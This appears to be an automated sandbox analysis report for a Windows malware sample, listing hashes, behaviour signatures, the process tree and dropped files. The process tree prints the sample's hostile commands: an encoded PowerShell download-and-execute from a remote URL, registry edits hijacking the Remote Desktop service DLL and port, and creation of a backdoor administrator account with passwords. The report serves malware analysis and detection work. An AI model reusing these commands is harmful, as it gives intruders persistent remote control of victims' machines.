Analysis
-
max time kernel
57s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 11:31
General
-
Target
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
-
Size
3.5MB
-
MD5
62e859cf533b93d38a05a2490b65fdf4
-
SHA1
85098ce68d91cd54795beca743c7de06b546997c
-
SHA256
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d
-
SHA512
3b90b0d2bc04c21be9b5330d5fccea3708b699c3fa054c90acf89e363ea8f97def8d2cb3ee938139596293e58ef727d27cda3add8c46caf8eddcd8b75494c479
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Modifies data under HKEY_USERS 217 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
-
Suspicious use of WriteProcessMemory 72 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe"C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7535.tmp" "c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uM6Ul3PI /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uM6Ul3PI /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uM6Ul3PI /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uM6Ul3PI1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uM6Ul3PI2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uM6Ul3PI3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7535.tmpMD5
623f8149392a752360685aad9197c7ca
SHA10560b55d276649309224e59b75eb339bf92f0d7b
SHA25636f84235392d010b75a44ede7c5ef848ead501e8268b0fafe0c25c7850d93c78
SHA512a8972114dfe95b71b12090998ce4272f5f53f64a581c9dd194ac7b9d043e3fd29cde4c54efcb36a27895278c801f27338ab3303edc25eaa8e8f9ef361e781159
-
C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.dllMD5
44c73405b93cd7a563864bd0e91ce826
SHA1c004019a330c66edb082920a7dfbd8345471d82b
SHA2562981692ab2abfbbcdb322ba059098baaa2f54f67aa9915ad7957ae0f585fb777
SHA512a2b1c14463da1314e3b6361231da8796fad61f2dd39eded562d60e4d46cdd5acdbfc01e4d14764b7a7fc3064e10e23b174819a457c42fa2a5eeae30cdca5e800
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMPMD5
e491d8b5376c80a6a5c8546c6f35778e
SHA1f399519591cada20e4841468ffeec82295ec7c14
SHA256b758abe5750ab5cf9ea05fd45a6faf5e38820466d2ca168b15015aaf0614a5b9
SHA5126eb0c90f95a357c04221661da666d55b6c517dec806ba31dcc2cdd1892c32b183cdefce1a1ed66bc7ea2ddfabfbc7a6ae9bcf8b25d1609db6fe336ff80201271
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdlineMD5
20c1eda5fbd9c49c273416c2922aa7ed
SHA1ba0c5ccffa5c1bee73e0d81b8fc2f0deb9c7b133
SHA2561df07f4ff66b20617de825bb346218701eb6b1b3e48696ccaab8125b32609cbd
SHA512c38b96823a2a0377b03f280c732765cd6976e18080159194a406f6c8a72ba43d289d1c29efa5ee5b76776a91a1f734d7c06e3112e1bd1bd004486f9f2fb20c92
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/68-24-0x0000000000000000-mapping.dmp
-
memory/188-21-0x0000000000000000-mapping.dmp
-
memory/396-52-0x0000000000000000-mapping.dmp
-
memory/420-44-0x0000000000000000-mapping.dmp
-
memory/420-54-0x0000000000000000-mapping.dmp
-
memory/432-31-0x0000000000000000-mapping.dmp
-
memory/520-22-0x0000000000000000-mapping.dmp
-
memory/740-51-0x0000000000000000-mapping.dmp
-
memory/748-36-0x0000000000000000-mapping.dmp
-
memory/760-4-0x0000027772D90000-0x0000027772D91000-memory.dmpFilesize
4KB
-
memory/760-5-0x0000027772F40000-0x0000027772F41000-memory.dmpFilesize
4KB
-
memory/760-2-0x0000000000000000-mapping.dmp
-
memory/760-3-0x00007FF897720000-0x00007FF89810C000-memory.dmpFilesize
9.9MB
-
memory/760-14-0x0000027772ED0000-0x0000027772ED1000-memory.dmpFilesize
4KB
-
memory/908-38-0x0000000000000000-mapping.dmp
-
memory/940-25-0x0000000000000000-mapping.dmp
-
memory/1332-10-0x0000000000000000-mapping.dmp
-
memory/1344-27-0x0000000000000000-mapping.dmp
-
memory/1356-26-0x0000000000000000-mapping.dmp
-
memory/1788-45-0x0000000000000000-mapping.dmp
-
memory/2044-41-0x0000000000000000-mapping.dmp
-
memory/2068-30-0x0000000000000000-mapping.dmp
-
memory/2212-39-0x0000000000000000-mapping.dmp
-
memory/2220-20-0x0000000000000000-mapping.dmp
-
memory/2228-35-0x0000000000000000-mapping.dmp
-
memory/2292-23-0x0000000000000000-mapping.dmp
-
memory/2296-47-0x00007FF897720000-0x00007FF89810C000-memory.dmpFilesize
9.9MB
-
memory/2296-46-0x0000000000000000-mapping.dmp
-
memory/2436-18-0x0000000000000000-mapping.dmp
-
memory/2456-34-0x0000000000000000-mapping.dmp
-
memory/2580-19-0x0000000000000000-mapping.dmp
-
memory/2684-40-0x0000000000000000-mapping.dmp
-
memory/2684-16-0x0000000000000000-mapping.dmp
-
memory/2688-15-0x0000000000000000-mapping.dmp
-
memory/2768-37-0x0000000000000000-mapping.dmp
-
memory/2768-53-0x0000000000000000-mapping.dmp
-
memory/3356-32-0x0000000000000000-mapping.dmp
-
memory/3372-1-0x00000000029E0000-0x00000000029E1000-memory.dmpFilesize
4KB
-
memory/3452-43-0x0000000000000000-mapping.dmp
-
memory/3532-7-0x0000000000000000-mapping.dmp
-
memory/4056-17-0x0000000000000000-mapping.dmp
-
memory/4088-33-0x0000000000000000-mapping.dmp
